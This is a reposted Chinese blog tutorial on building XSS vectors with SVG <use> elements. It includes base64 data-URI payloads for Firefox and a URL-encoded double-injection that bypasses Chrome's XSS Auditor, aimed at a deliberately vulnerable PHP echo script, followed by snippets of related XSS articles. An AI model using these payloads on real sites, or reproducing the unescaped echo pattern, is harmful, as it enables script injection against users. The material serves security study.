【转】用SVG绕过浏览器XSS审计

原文 http://www.cnblogs.com/r00tgrok/p/SVG_Build_XSS_Vector_Bypass_Firefox_And_Chrome.html

======================
SVG - <use> element
======================
SVG中的<use>元素用于重用其他元素,主要用于联接<defs>和alike,而我们却用它来引用外部SVG文件中的元素元素通过其id被引用,在<use>标签的xlink:href属性中以‘#‘井字符开头,外部元素的引用同样如此基本结构如下所示:

test.html
<svg>
<use xlink:href=‘external.svg#rectangle‘ />
</svg>
external.svg:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<a xlink:href="javascript:alert(location)">
<rect x="0" y="0" width="100" height="100" />
</a>
</svg>
sxternal.svg文件以<svg>标签开始,其id设置为rectangle(矩形),使用<rect>标签绘一个矩形。可以使用<a>环绕<rect>标签,这样会创建一个超链接。使用Javascript的url协议,可点击的超链接在点击后会执行Javascript。

虽然SVG是经由<use>标签加载的,Javascript将会得到执行。有一点需要注意,它只能加载SVG文件,必须满足同源策略

======================
FIREFOX
======================
由于加载的外部SVG文件必须是同源的,这个特性看起来似乎无法作为有用的XSS攻击向量,但Firefox会帮我们提升这个攻击向量首先,你可以使用data:url协议,它允许我们百忙之中从内部创建一个文件。它要求正确的mime-type,在这里为image/svg+xml。mimie-type后是我们的攻击载荷或关键字base64。特别地,由于数据被base64编码,这有助于避免突破HTML结构的问题。现在我们不必再依赖于服务器上的另一个文件了:
test.html:
<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDo
vL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW
5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rI
iAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8
YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0KGx
vY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdG
g9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zd
mc+#rectangle" />
</svg>

 解码后的base64载荷:

<svg id="rectangle"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<a xlink:href="javascript:alert(location)">
<rect x="0" y="0" width="100" height="100" />
</a>
</svg>
浏览器会显示出一个黑色的矩形,当点击时会弹出其location但是为什么要烦扰受害者去点击呢,他们从来都不会去做该做的事:)external.svg中的<script>标签不会被解析,但是SVG支持<foreignObject>元素
通过阐述这个对象需要的扩展属性,有可能加载非SVG元素这就意味着现在有可能是有<iframe>、<embed>及其他所有支持的HTML元素了,我们可以从一堆元素中进行选择执行Javascript,这里使用<embed>+JavascriptURL协议看如下SVG:
<svg id="rectangle"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">

<script>alert(1)</script>

<foreignObject width="100" height="50"
requiredExtensions="http://www.w3.org/1999/xhtml">

<embed xmlns="http://www.w3.org/1999/xhtml"
src="javascript:alert(location)" />

</foreignObject>
</svg>
它会通过<foreignObject>加载嵌入的标签,使用JavascriptURL协议执行Javascript然后我们用base64对载荷进行编码,通过data:协议加载它test.html
<svg>
<use xlink:href="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD
ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs
aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW
5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3
JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i
NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZW
RFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8x
OTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dH
A6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0i
amF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQ
ogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" />
</svg>
在这个案例中,test.html用Firefox27打开,会弹出location:

这样我们在SVG中就有了另一个能执行Javascript的向量了另外,在攻击载荷中包含了一个<script>alert(1)</script>,这证明了<script>标签不会被解析
======================
CHROME 
XSS Auditor Bypass
======================现在用这个特性来对付Chrome,Chrome不支持<use>标签xlink:href属性中的data:URL协议,另外目前还没有找到无需用户交互便执行Javascript的方法不过至少在右用户交互的情况下,可以Bypass Blink/Webkit XSS Auditor这里不需要用到参数污染,有一个参数就够了,Blink/Webkit XSS Audito无法捕获将参数拆分成两个或多个的XSS攻击
看一下这个php脚本(xss.php):
<?php
echo "<body>";
echo $_GET[‘x‘];
echo "</body>";
?>
这个脚本存在XSS漏洞,但是使用下面这样的载荷则会触发XSS Auditor:
http://site.com/xss.php?x=<svg><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>

 因此,让我们使用<use>元素吧

======================
Creating the
SVG on the fly
======================
我们想加载另外的SVG文件,因此我们以<svg><use xlink:href= 开始
但是等一下,它必须满足同源,我们不能使用data伪协议,该怎么获取服务器上的文件呢?很简单,我们在一行中两次利用XSS漏洞!首先,我们构建一个URL,制作一个包含了Javascript URL为伪协议的SVG
http://site.com/xss.php?
x=<svg id="rectangle"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<a xlink:href="javascript:alert(location)">
<rect class="blue" x="0" y="0" width="100" height="100" />
</a>
</svg>
如果你将整个URL粘贴到没有XSS Filter的浏览器,马上就会出现一个黑色的矩形。但是前面已经提到过,Chrome的XSS Auditor会捕获这种攻击,还是继续吧:现在我们要在<use>元素中使用创建的SVG文件,制造一个形如这样的URL:
http://site.com/xss.php?
x=<svg><use height=200 width=200
xlink:href=‘http://vulnerabledomain.com/xss.php
?x=<svg id="rectangle"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
width="100" height="100">
<a xlink:href="javascript:alert(location)">
<rect class="blue" x="0" y="0" width="100" height="100"/>
</a></svg>#rectangle‘/></svg>

不要忘了进行URL编码:

http://site.com/xss.php?
x=%3Csvg%3E%3Cuse%20height=200%20width=200%20
xlink:href=%27http://site.com/xss.php?
x=%3Csvg%20id%3D%22rectangle%22%20
xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20
xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20
%20%20%20width%3D%22100%22%20height%3D%22100%22%3E
%3Ca%20xlink%3Ahref%3D%22javascript%3Aalert%28location%29%22%3E
%3Crect%20class%3D%22blue%22%20x%3D%220%22%20
y%3D%220%22%20width%3D%22100%22
%20height%3D%22100%22%20%2F%3E
%3C%2Fa%3E
%3C%2Fsvg%3E%23rectangle%27/%3E%3C/svg%3E

这下应该会显示出矩形了,点击就会执行alert,但是这一次没有触发XSS Auditor :)

时间: 2024-10-02 22:59:41

【转】用SVG绕过浏览器XSS审计的相关文章

Pikachu-xss盲打、xss绕过和xss之htmlspecialchars

xss盲打:并不是一种xss漏洞的类型,其实说的是一种xss的攻击场景. 开始我们的实验 随便输入后,(并不会在前端输出) 是不是这种输入 不输出在前端就不会有问题呢? 再输入弹窗试试(还是不在前端输出)       管理员登陆后台,后台的界面会把我们输入的内容输出,后台的管理员会被X到.这种场景被称为xss的盲打 点击提示,模拟下后台登陆,输入账号admin 密码123456 跨站脚本x的是后台. xss绕过 xss绕过-过滤-转换 0.说的是我们的安全措施不要在前端做,比如我们Pikachu

解决SVG跨浏览器兼容性问题

Raphael JS:SVG/VML+JS实现跨浏览器的矢量图形实现方案 http://blog.csdn.net/tiewen/article/details/8535748 SVG那些小事儿 http://www.w3cfuns.com/article-5601506-1-1.html Raphaël—JavaScript Library http://raphaeljs.com/ Raphael JS:SVG/VML+JS实现跨浏览器的矢量图形实现方案

漏洞利用:验证绕过,XSS利用,Cookic盗用,文件上传

1.      文件上传 低级别 写好上传的内容 选择好上传的文件 上传成功. 测试:访问文件,执行代码 中级别 修改文件后缀为png 上传该文件 抓包修改文件后缀为php,然后允许数据包通过. 上传成功 测试:访问文件,执行代码 2.      验证码绕过 首先将秘钥添加到配置文件 低级别 step值1,有验证,step值2,无验证,所以将数据包step值修改为2,然后发送即可绕过. 中级别 将数据包step值修改为2,并添加passed_captch=true,然后发送即可绕过. 3.   

filter_var 函数()使用javascript伪协议绕过执行xss

escape 过滤器来过滤link,而实际上这里的 escape 过滤器,是用PHP内置函数 htmlspecialchars 来实现的 htmlspecialchars 函数定义如下: htmlspecialchars:(PHP 4, PHP 5, PHP 7) 功能 :将特殊字符转换为 HTML 实体 定义 :string htmlspecialchars ( string $string [, int $flags = ENT_COMPAT | ENT_HTML401 [, string$

如何绕过浏览器的弹窗拦截机制

在chrome的安全机制里面,非用户触发的window.open方法,是会被拦截的.举个例子: var btn = $('#btn'); btn.click(function () { //不会被拦截 window.open('http://cssha.com') }); 上面的代码中,window.open是用户触发的时候,是不会被拦截的,可以正常打开新窗口.再看下面这个: var btn = $('#btn'); btn.click(function () { $.ajax({ url: '

【转】Web前端黑客技术揭秘{笔记}

原文 http://www.cnblogs.com/r00tgrok/articles/Web-Hacking.html 前些日子看完了白帽子讲Web安全,当时就PHP安全一 章做了点小笔记,感觉看书还是留下点东西比较好.翻开Web前端黑客技术揭秘一书决定要做笔记,但是这样下来其实进度就比较慢了,敲字做笔记绝对远比看书 来的慢.有时候上午看完的内容做笔记时要花一天时间,一方面是要敲字,另一方面是自己只从书上摘录部分内容有时候需要将其串起来,还有就是碰上自己想发两 句言也会拖慢进度.总之现在书是看

【转】WAF指纹识别和XSS过滤器绕过技巧

原文链接 http://www.cnblogs.com/r00tgrok/p/Bypass_WAF_and_XSS_Filter_And_Fingerprinting.html [译文] -- “Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters” 0x1 前言 之前在乌云drops上看到一篇绕过WAF跨站脚本过滤器的一些技巧,是从国外的一篇paper部分翻译过来的,可以说文章摘取了原文核心的代码部分

XSS跨站脚本小结(转)

原文链接:http://www.cnblogs.com/xiaozi/p/5588099.html#undefined XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如<a><img>等. 参考链接:http://www.jb51.net/tools/xss.htm  http://d3adend.org/xss/ghettoBypass ';alert(String.fromCharCode(88,83,83))//\';alert(S

xss脚本攻击

xss脚本攻击不仅仅只是alert(1)就算完了,xss脚本攻击真正的用处是盗取普通用户的cookie,或者盗取管理员的cookie. xss分类(类型): 1. 反射型xss 2. 存储型xss 3. DOM型xss xss分类(代码): 1.js代码中xss 2.事件中的xss 3.html中的xss 4.外部引入xss 说到外部引入,讲一下同源策略与跨域请求 同源策略: 由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略,所谓同源是指:协